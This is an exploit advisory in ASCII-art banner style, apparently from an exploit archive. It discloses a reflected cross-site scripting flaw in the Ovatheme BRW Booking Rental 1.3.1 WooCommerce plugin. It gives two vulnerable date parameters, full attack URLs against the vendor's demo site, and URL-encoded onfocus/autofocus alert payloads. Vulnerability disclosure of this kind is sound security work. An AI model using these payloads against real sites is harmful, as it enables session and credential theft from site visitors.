Headline
WooCommerce BRW Booking Rental 1.3.1 Cross Site Scripting
WooCommerce plugin BRW Booking Rental version 1.3.1 from Ovatheme suffers from a cross site scripting vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : Ovatheme.com ││ Vendor : Ovatheme ││ Software : BRW - Booking Rental 1.3.1 Plugin WooCommerce ││ Vuln Type: Reflected XSS ││ Method : GET ││ Impact : Manipulate the content of the site ││ ││────────────────────────────────────────────────────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ The attacker can send to victim a link containing a malicious URL in an email or ││ instant message can perform a wide variety of actions, such as stealing the victim's ││ session token or login credentials ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'ovabrw_pickup_date' is vulnerable to XSShttps://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=[XSS]&ovabrw_pickoff_date=&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=productGET parameter 'ovabrw_pickoff_date' is vulnerable to XSShttps://demo.ovatheme.com/brw/?ovabrw_name_product=&cat=car&ovabrw_pickup_loc=Airport&ovabrw_pickoff_loc=Airport&ovabrw_pickup_date=&ovabrw_pickoff_date=[XSS]&ovabrw_attribute=color&color=blue&ovabrw_tag_product=&taxonomy_default1_name=&taxonomy_default2_name=&brw_hotel_type_name=&brw_car_year_name=&brw_boat_height_name=&brw_boat_width_name=&brw_bmw_model_name=&brw_ford_model_name=&order=ASC&orderby=date&ovabrw_search_product=ovabrw_search_product&ovabrw_search=search_item&post_type=productSome XSS Payloads Reflectedbbb4l%22%20onfocus%3dalert(1)%20autofocus%3d%20q9s9yne503%22%20onfocus%3dalert(1)%20autofocus%3d%20sg1gu[-] Done